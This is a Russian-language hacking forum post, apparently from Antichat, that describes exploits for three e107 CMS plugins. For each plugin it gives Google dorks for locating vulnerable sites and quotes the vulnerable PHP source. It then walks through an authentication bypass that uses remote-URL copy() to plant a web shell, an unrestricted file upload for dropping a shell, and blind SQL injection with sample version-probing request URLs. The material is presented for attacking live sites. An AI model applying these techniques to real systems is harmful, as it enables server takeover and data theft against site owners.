Форум АНТИЧАТ - Показать сообщение отдельно

FileDownload Advanced v2.0 by The Hunter

скачать

гугл- inurl:e107_plugins/FileDownload

http://[host]/[path]/e107_plugins/FileDownload/filedownload/upload.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]require_once([/COLOR][COLOR="#DD0000"]"config.php"[/COLOR][COLOR="#007700"]);

require_once([/COLOR][COLOR="#DD0000"]"functions.php"[/COLOR][COLOR="#007700"]);

if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"dir"[/COLOR][COLOR="#007700"]])

[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"dir"[/COLOR][COLOR="#007700"]];

else

[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"dir"[/COLOR][COLOR="#007700"]];

if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"numfiles"[/COLOR][COLOR="#007700"]])

[/COLOR][COLOR="#0000BB"]$numfiles[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"numfiles"[/COLOR][COLOR="#007700"]];

else

[/COLOR][COLOR="#0000BB"]$numfiles[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"];

if ((isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"hide"[/COLOR][COLOR="#007700"]])) and (isset([/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#007700"])))

{

    for ([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"file"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]++)

    {

[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"file"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$copy[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]getFileName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]$upload_ok[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Uploaded:"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]getFileName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" successfully."[/COLOR][COLOR="#007700"];

    }

}[/COLOR][/COLOR]

./config.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//$expPrefPass='';

[/COLOR][COLOR="#0000BB"]$expBaseDir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'../'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$expSortOrder[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$expDisplaySearch[/COLOR][COLOR="#007700"]...

[/COLOR][COLOR="#0000BB"]Как видно первая строка закоментирована[/COLOR][COLOR="#007700"].

...[/COLOR][/COLOR]

./functions

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]require_once([/COLOR][COLOR="#DD0000"]"config.php"[/COLOR][COLOR="#007700"]);

if (isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"phpFileDownload_login"[/COLOR][COLOR="#007700"]]))

    if ([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"phpFileDownload_login"[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#0000BB"]$expPrefPass[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"location: login.php"[/COLOR][COLOR="#007700"]);...

[/COLOR][COLOR="#0000BB"]И посему нет никакой переадресации если куки не устанавливать[/COLOR][COLOR="#007700"]. ):

...function[/COLOR][COLOR="#0000BB"]getFileName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])

{

[/COLOR][COLOR="#0000BB"]$strlen[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]); 

[/COLOR][COLOR="#0000BB"]$retfile[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

    while ([/COLOR][COLOR="#0000BB"]$strlen[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])

    {

[/COLOR][COLOR="#0000BB"]$_g[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$strlen[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])),[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);

        if (([/COLOR][COLOR="#0000BB"]$_g[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"\\"[/COLOR][COLOR="#007700"]) or ([/COLOR][COLOR="#0000BB"]$_g[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"]))

            break;

[/COLOR][COLOR="#0000BB"]$retfile[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$strlen[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])); 

[/COLOR][COLOR="#0000BB"]$strlen[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$strlen[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]; 

    } 

    return[/COLOR][COLOR="#0000BB"]$retfile[/COLOR][COLOR="#007700"];

}...[/COLOR][/COLOR]

Результат:

Цитата:

Сообщение от None

Функция copy
Замечание: Начиная с PHP версии 4.3.0, оба параметра, source и dest, могут быть URL'ами, если были включены "упаковщики fopen"

Заливаем на хостинг шелл или с своего розшареного.

Посылаем запрос:

Наш шелл:

http://[host]/[path]/FileDownload/filedownload/log/shell.php

ps др. способы заливки

TiltViewer v1.2 by The_Death_Raw

Если уставновлен,то повезло.скачать

Заливаем шельца!

гугл-inurl:e107_plugins/tiltviewer

http://[host]/[path]/e107_plugins/tiltviewer/gestion_fichiers.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...[/COLOR][COLOR="#FF8000"]// fonction upload

[/COLOR][COLOR="#007700"]foreach ([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"filez"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]"error"[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#007700"]) {

    if ([/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]UPLOAD_ERR_OK[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"filez"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]"tmp_name"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"filez"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]"name"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tmp_name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"./uploads/[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

        

[/COLOR][COLOR="#0000BB"]Header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'PHP_SELF'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]); 

 

    }...[/COLOR][/COLOR]

Выбираем наш шелл и Send the files

http://[host]/[path]/e107_plugins/tiltviewer/uploads/name_our_shell.php

ps заходил под админом и тогда лил, хоть и нужны права но мб пригодиться

др. способы заливки

AACGC Hall of Shame v1.6 by ~M@CH!N3~

07:27 02-Apr-10

скачать

Blind SQL inj

гугл- inurl:e107_plugins/aacgc_hos

[path]/e107_plugins/aacgc_hos/HOS_Details.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...require_once([/COLOR][COLOR="#DD0000"]"../../class2.php"[/COLOR][COLOR="#007700"]);

require_once([/COLOR][COLOR="#0000BB"]HEADERF[/COLOR][COLOR="#007700"]);

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

[/COLOR][COLOR="#FF8000"]//------------------------------------------------------------------------------------------------------------

[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_hos"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE hos_id =[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();...[/COLOR][/COLOR]

плюс - никаких условий.

минус - надо знать hos_id.

Результат:

Пусть hos_id=1 и5 ветка

http://[host]/[path]/e107_plugins/aacgc_hos/HOS_details.php?.1 and substring(version(),1,1)=5 - есть контент!

http://[host]/[path]/e107_plugins/aacgc_hos/HOS_details.php?.1 and substring(version(),1,1)=4 - нет контента!

ps с "+" контент не выводился (если в гет пихать)